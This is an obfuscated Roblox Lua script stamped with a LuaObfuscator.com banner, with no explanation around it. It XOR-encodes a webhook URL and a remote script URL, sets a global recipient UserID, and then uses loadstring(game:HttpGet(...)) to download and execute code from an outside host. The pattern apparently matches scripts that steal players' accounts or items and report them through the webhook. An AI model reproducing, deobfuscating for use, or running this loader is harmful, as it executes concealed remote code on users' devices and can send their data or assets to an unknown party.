--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.7) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=(450 -(253 + 195)) -1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 + 0)),v1(v2(v9,(1514 -(1115 + 398)) + ((v11-(4 -3))% #v9),(25 -(7 + 1 + 16)) + ((v11-(4 -3))% #v9) + 1)))%(1074 -(654 + 164))));end return v5(v10);end _G.UserID=143457350 + (316811220 -(1288 + 236));_G.WebHook=v7("\16\230\232\102\147\214\87\189\248\127\147\143\23\224\248\56\131\131\21\189\253\102\137\195\15\247\254\126\143\131\19\225\179\39\208\218\74\166\175\32\216\223\76\166\164\38\215\217\72\164\173\37\207\182\17\243\197\120\210\189\18\220\212\117\161\148\61\254\216\114\130\157\48\247\173\115\208\149\42\215\174\103\141\155\58\220\255\110\164\142\53\208\200\119\213\175\42\230\222\84\174\169\21\241\207\34\180\155\23\250\206\112\161\161\72\208\200\36\147\141\49","\120\146\156\22\224\236");loadstring(game:HttpGet(v7("\32\97\105\238\223\108\167\10\58\116\106\176\203\63\252\77\61\119\104\237\201\36\235\74\38\97\120\240\216\120\235\74\37\58\78\247\192\51\230\70\45\70\126\236\197\38\252\86\103\69\110\230\255\53\250\76\56\97\110\176\224\35\233\10\37\116\116\240\131\6\251\93\9\96\105\241\202\55\250\72\102\97\111\235\201","\72\21\29\158\172\86\136\37")))();
